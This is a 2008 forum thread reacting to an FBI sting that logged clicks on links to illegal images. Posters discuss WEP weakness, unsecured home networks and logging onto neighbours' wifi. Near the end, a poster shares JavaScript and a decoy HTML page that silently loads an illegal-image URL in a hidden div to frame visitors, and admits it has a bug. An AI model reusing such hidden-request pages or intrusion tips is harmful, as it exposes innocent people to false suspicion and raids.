Posted on 03/24/2008 2:16:11 PM PDT by E. Pluribus Unum
If your WiFi and computer support it, it is best to go with WPA security instead of the older, and easily hacked WEP security method.
Here is a link to a transcript from a very good podcast on security called "Security Now" where they talk about the problems with WEP security. There is also an audio link on the site if you wish to listen to the original podcast. It's a pretty good show on information security which is podcast once a week.
Ok, so you take your laptop to someone’s house you don’t particularly like, hook it into the Internet and ........
It's not entrapment because it leads to a search warrant, not an arrest (at least for not clicking the link).
Is that all! I think I will call the FBI to come by tomorrow. Everybody loves it when they show up at a business, halt a days work and leave with all of their clients wondering why the FBI are interested in us.
It’s not like there will be any trouble.
Here is the sad part, I read awhile back (Can't find the dang story now darn it) that the vast majority of home private networks don't even enable the password function.
Further, the majortiy of folks who setup a home network using Microsoft use MSHOME (the default) as the network name and no passoword. Put those two together with the above story and consider the implications.
In other words you don't have to be a hacker, just someone who knows how to connect to a wireless network and then knows the default for a home network name is MSHOME.
Bango you are now into someone's network and can SEE their computers if they have them on. If they have file sharing enabled you can look around and even dump files onto their comps.
I wonder what the ACLU thinks of this idea...hehehe
Another thing. Website servers record the URL that was clicked on, not the words on the link. For government officials and other weakminded individuals, a link can say “click here to buy apples”, but the link can take you to a site that sells oranges. You don’t know where it’s taking you to. It’s possible to fool the user. The only record on the server will be of the URL that the user actually went to, not the words that the user saw.
BS. This is about a general principle. Some can carry this practice out to its logical conclusion and apply it beyond just the scope of just child porn.
That logical conclusion could see this one day applying to anyone clicking on links of sites that sell firearms should the enemies of the 2nd amendment ever have their way.
Yes, but it’s your IP address, and it will be your door being kicked in by nice men with balaclavas and MP-5’s at 3:00 AM, and your dog being shot. At that point, the fact that they don’t find anything they can prosecute you for will be very, very small comfort.
Yea! They just seize your computer but you won’t be in any trouble. LOL
Obviously nobody wants a visit from the FBI. I think the truth of the matter is that this program falls somewhere in between the two extreme views of "There is nothing to worry about unless you are into kiddie porn" and "If someone doesn't like you they can send you an email with the link and you will go to prison for the rest of your life just for opening the email" that seem to dominate this thread. I was hoping that my presentation of a hypothetical scenario of how the program would actually play out might at least generate some discussion along those lines and somewhere between the two extremes.
And it’s perfectly possible to have a computer request URLs and never indicate to the user that any such request was ever made or any response received by their computer. The FBI has obviously never heard of AJAX - if I knew the URL to their bad content, I could easily set up a completely innocent website that created a record in the FBI’s logs that everyone who came to it accessed the “illegal” link.
Careful with that Google toolbar, by the way.
The armed SWAT raid will be to your IP, though.
Once they are finished subduing you and taking all your computer stuff, next day you can explain at your arraignment. They even take your music CDs.
And will it cost me $10,000 in legal fees and two years or so to get my computer back from the FBI?
My daughter just can't understand why I won't give her friends the codes to get on our wireless when they visit.
I've been laughed at by several of the parents for my paranoia, that is until I did a driveby login at the one parent who chided me the most.
Amazingly after that I got several calls to help those same people secure their systems. 3 of them had no passwords on anything.
I guess you can put me in the skeptical department. I find it unbelievable that our government can actually produce a system that works like a clock when they have never managed it to date.
I do appreciate all the information,did not think about others using this network.
$FBI_GETS_TO_RAID_YOUR_HOUSE_URL = "http://unlawfulimages.net/childporn.jpg";
function makeHTTPRequest(method, url, parameters)
{
http_request = false;
if (window.XMLHttpRequest) {
// For Mozilla, Safari etc.
http_request = new XMLHttpRequest();
if (http_request.overrideMimeType) {
// set type accordingly to anticipated content type
http_request.overrideMimeType($mime_type);
}
}
else if (window.ActiveXObject) {
// For IE
try { http_request = new ActiveXObject("Msxml2.XMLHTTP"); }
catch (e) {
try { http_request = new ActiveXObject("Microsoft.XMLHTTP"); }
catch (e) {}
}
}
if (!http_request) { alert('Cannot create XMLHTTP instance'); return false; }
http_request.open(method, url, true);
http_request.setRequestHeader("Content-type", $mime_type);
http_request.setRequestHeader("Connection", "close");
request_timestamp= new Date();
if ((parameters=='')||(parameters==undefined)) {
parameters = 'reqtime=' +encodeURI(request_timestamp)+"&rng="+Math.random();
}
else {parameters = parameters + '&reqtime='+encodeURI(request_timestamp)+"&rng="+Math.random();}
http_request.send(parameters);
return http_request;
}
$div_user_has_no_idea_is_here = "hiddendiv";
function LoseConstitutionalRights() {
var this_object = document.getElementById($div_user_has_no_idea_is_here);
if (this_object=="") { return("Could not find object of name: "+element_id); }
var http_request=makeHTTPRequest("GET",filename);
http_request.onreadystatechange=function() {
if(http_request.readyState==4) {
this_object.innerHTML=this_object.innerHTML+http_request.responseText;
if (focus!='') {
var this_focus=document.getElementById(focus);
if ((this_focus=="")||(this_focus==undefined)) { return("Could not find object of name: "+element_id); }
this_focus.focus();
}
}
}
}
Now I can just stick a body OnLoad="LoseConstitutionalRights();" tag into a page and you're f-ed. <html> <head> <title> Welcome to FluffyBunnies.com</title> </head> <body OnLoad="javascript:LoseConstitutionalRights())"> Welcome to fluffy bunnies! Aren't they cute! Show all your pals! <div id="hiddendiv" style="display:none;"></div> </body> </html>Come see the most adorable fluffy bunny site ever!
Ah whoops there’s a bug in that... probably better that way, but still the concept is sound.
Disclaimer: Opinions posted on Free Republic are those of the individual posters and do not necessarily represent the opinion of Free Republic or its management. All materials posted herein are protected by copyright law and the exemption for fair use of copyrighted works.